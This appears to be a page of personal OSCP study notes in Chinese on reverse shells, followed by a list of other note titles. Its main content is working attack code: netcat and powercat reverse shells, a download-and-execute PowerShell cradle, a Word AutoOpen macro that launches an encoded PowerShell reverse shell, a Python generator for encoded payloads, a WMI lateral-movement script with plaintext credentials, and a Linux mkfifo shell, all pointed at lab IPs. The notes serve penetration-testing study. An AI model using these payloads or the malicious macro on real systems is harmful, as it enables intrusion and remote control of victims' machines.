【反向 shell】

# kali 開啟 443 listener
nc -nvlp 443

window

# 一旦監聽器正在運行，我們將再次使用Web殼在MULTISERVER03上執行`nc.exe`，
# 並使用`-e`參數在連接建立後執行`cmd.exe`。
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 443

//windows
os-shell> curl http://192.168.45.189/nc.exe -o "C:\\inetpub\\wwwroot\\nc.exe"

os-shell> C:\\inetpub\\wwwroot\\nc.exe 192.168.45.189 4444 -e cmd.exe
// or
powershell.exe -nop -w hidden \
-enc 'IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.45.189/powercat.ps1");powercat -c 192.168.45.189 -p 4444 -e powershell'

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."

n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.237/powercat.ps1');powercat -c 192.168.45.237 -p 443 -e powershell

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.237/powercat.ps1');powercat -c 192.168.45.237 -p 443 -e powershell

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String

Str = Str + "powershell.exe -nop -w hidden -e SUVYKE5ldy1PYmplY"
Str = Str + "3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5"
Str = Str + "nKCdodHRwOi8vMTkyLjE2OC40NS4yMzcvcG93ZXJjYXQucHMxJ"
Str = Str + "yk7cG93ZXJjYXQgLWMgMTkyLjE2OC40NS4yMzcgLXAgNDQzIC1"
Str = Str + "lIHBvd2Vyc2hlbGw="
  
CreateObject("Wscript.Shell").Run Str

End Sub

python

import sys
import base64
kali = "192.168.45.153"
payload = '$client = New-Object System.Net.Sockets.TCPClient("'+kali+'",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)

橫移登入

$ip = '192.168.236.72';
$username = 'jen';
$password = 'Nexus123!';
$base64Cmd = 'JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEAOAA3ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$Options = New-CimSessionOption -Protocol DCOM;
$Session = New-Cimsession -ComputerName $ip -Credential $credential -SessionOption $Options;
$Command = 'powershell -nop -w hidden -e '+ $base64Cmd;
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

Linux

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 443 >/tmp/f

OSCP 筆記

Google haking

【Tunnel】Port forwarding and Tunneling

【Tip】關於 bash

【kali】未安裝工具

OSCP Recipe 2023

常用目錄/檔案

【php】php攻擊手法

【反向 shell】

【Linux】【列舉】常用命令

【Windows】【列舉】常用命令

【kali】解析度設定

【Ｗindows】【提權】Get-ObjectAcl 搜尋自己可管理帳號

【Windows】登入方法

【轉載】Emotet病毒惡意文件分析實例

【Mac】未安裝軟體

【Linux】【提權】相關指令

包包的解題思路

exam

【Data】SecLists

【Terminal】telnet

【Terminal】powercat

【Terminal】rlwrap

【web】【windows】【PowerShell】 iwr

【Shell】powershell

【shell】find

【online】【編碼】jscompress.com

【online】【編碼】CyberChef

【PortScan】netcat

【PortScan】nmap

【PortScan】rustscan

【GitHub】Gitrob 和 Gitleaks

【DNS】Host

【DNS】dnsrecon

【DNS】DNSEnum

【DNS】whois

【DNS】nslookup

【SMB】nbtscan

【SMB】WsgiDAV

【SMB】net view

【SMB】enum4linux

【SMB】smbclient

【SMB】【Remote】 CME ( CrackMapExec )

【SNMP】onesixtyone

【SNMP】snmpwalk

【Romote】xfreerdp rdesktop

【PathBuster】Gobuster

【linux】【提權】【弱掃】linpeas

【Linux】【提權】GTFOBins

【AD】【列舉】ADRecon

【AD】【列舉】BooldHound

【Exploit】SearchSploit

【Honeypot】canarytokens

【AD】【列舉】PowerView.ps1

【AD】【列舉】PsLoggedOn

【AD】【列舉】Get-Acl

【AD】net

【AD】【解碼】gpp-decrypt

【AD】【列舉】SharpHound

【列舉】wpscan

【SQL Injection】sqlmap

【file】【列舉】

【Linux】【列舉】linpeas

【web】【列舉】whatweb

【web】【爆破】burpsuite

【web】【爆破】gobuster

【terminal】php-reverse-shell

【web】【linux】【shell】curl

【sql】impacket-mssqlclient

【SQL_injection】github

【密碼】【破解】hashcat

【terminal】【impacket】psexec

【SMB】【Net-NTLMv2雜湊監聽】Responder

【shell】【impacket】ntlmrelayx

【列舉】【提權】【Linux】unix-privesc-check

【密碼】【字典】crunch

【破解】【SSH】Hydra

【列舉】【shell】getcap

【port forwarding】socat

【port forwarding】rinetd